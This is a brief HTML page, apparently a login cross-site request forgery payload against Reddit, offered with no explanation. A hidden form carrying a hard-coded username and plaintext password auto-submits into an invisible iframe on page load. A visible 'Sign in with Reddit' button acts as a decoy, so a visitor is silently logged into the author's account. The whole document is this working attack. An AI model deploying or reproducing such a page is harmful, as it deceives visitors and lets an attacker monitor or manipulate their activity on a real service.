<div>
  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js"></script>
  <center>
    <form method="post" target="target" style="display:none" action="https://www.reddit.com/post/login">
      <input type="hidden" name="user" value="dagny15"/>
      <input type="hidden" name="passwd" value="Johngalt15*" />
      <input type="submit" value="Sign in with Reddit" id="hiddenSubmit"/>
    </form>
    <form method="post">
      <input type="submit" value="Sign in with Reddit"/>
    </form>
    <iframe name="target" style="display:none"></iframe>
  </center>
  <script>
    $(document).ready(function(){
      $('#hiddenSubmit').click();
    });
  </script>
</div>
